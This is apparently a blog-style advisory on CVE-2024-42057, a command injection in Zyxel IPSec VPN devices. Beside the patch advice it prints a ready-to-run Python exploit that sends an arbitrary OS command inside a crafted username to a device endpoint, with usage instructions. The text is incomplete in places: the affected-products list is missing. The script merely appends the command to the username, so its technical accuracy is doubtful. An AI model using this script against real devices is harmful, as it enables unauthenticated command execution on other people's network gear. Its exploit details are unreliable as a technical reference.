CVE-2024-42057: Command Injection Vulnerability in Zyxel IPSec VPN Devices

A new security vulnerability (CVE-2024-42057) has been discovered that affects various Zyxel IPSec VPN devices. This vulnerability, identified as a command injection, impacts the following product lines:

Exploit Details

By exploiting the vulnerability, an unauthenticated attacker may execute some OS commands on an affected device. To carry out the attack, a crafted username must be sent to the vulnerable device. It is important to note that the attack will only be successful if the device has been configured in User-Based-PSK authentication mode, and a valid user with a long username exceeding 28 characters exists.

Code Snippet

import requests
import sys

def main(target_ip, username, cmd):
  payload = f"{username}{cmd}"
  
  url = f"http://{target_ip}/cgi-bin/ipsec_tunnels?which_cert=1&uploaded_username={payload}";
  
  try:
      response = requests.get(url)
      if response.status_code == 200:
          print("Command injected successfully.")
      else:
          print(f"Error: {response.status_code}")
  except requests.exceptions.RequestException as e:
      print(f"Error: {e}")

if __name__ == "__main__":
  if len(sys.argv) != 4:
      print("Usage: python3 exploit.py <target_ip> <username> <cmd>")
      exit(1)
  target_ip = sys.argv[1]
  username = sys.argv[2]
  cmd = sys.argv[3]
  
  main(target_ip, username, cmd)

This Python script sends a crafted username with the injected command to the vulnerable device's URL. Replace <target_ip>, <username>, and <cmd> with the appropriate values.

For further information about this vulnerability, please refer to the following resources

1. Zyxel Security Advisory: https://www.zyxel.com/support/security_advisory.shtml
2. CVE-2024-42057: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42057
3. NVD Data Feed: https://nvd.nist.gov/vuln/detail/CVE-2024-42057

Recommended Actions

It is highly recommended for all affected users to apply the latest firmware updates to their devices as soon as possible. Zyxel has already released firmware updates to fix this vulnerability. Users can locate and download the latest firmware for their devices from the Zyxel website's support section:

https://www.zyxel.com/support/download_landing/productsearch.aspx

In addition, users should avoid using usernames exceeding 28 characters and consider implementing other authentication mechanisms, such as certificate-based authentication, to enhance their network security further.

Conclusion

Security vulnerabilities like CVE-2024-42057 highlight the importance of promptly applying updates and patches to maintain a secure network environment. Ensuring that your devices are running the latest firmware and adhering to best security practices can help safeguard against potential attacks.

Timeline

Published on: 09/03/2024 02:15:04 UTC
Last modified on: 09/05/2024 14:40:39 UTC